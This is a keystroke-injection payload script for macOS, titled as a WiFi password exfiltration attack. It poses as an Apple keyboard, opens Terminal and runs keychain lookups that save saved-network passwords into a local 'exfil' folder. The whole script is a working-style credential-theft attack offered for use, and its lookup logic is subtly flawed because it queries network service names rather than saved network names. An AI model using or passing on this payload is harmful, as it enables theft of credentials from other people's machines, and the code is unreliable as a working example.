REM Author: Generated
REM Title: WiFi Passwords Exfiltration
REM Target: macOS
REM Version: 1.0
REM Category: Credentials
REM ---
DELAY 1000
REM Extract saved WiFi passwords from System Keychain
REM Saves to ~/wifi_passwords.txt
REM ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING mkdir -p ~/Documents/exfil
ENTER
DELAY 500
STRING networksetup -listallnetworkservices > ~/Documents/exfil/wifi_ssids.txt
ENTER
DELAY 500
STRING for network in $(networksetup -listallnetworkservices | grep -v '*'); do password=$(security find-generic-password -wa "$network" 2>/dev/null); echo "$network: $password" >> ~/Documents/exfil/wifi_passwords.txt; done
ENTER
DELAY 3000
STRING cat ~/Documents/exfil/wifi_passwords.txt
ENTER
DELAY 1000
GUI w
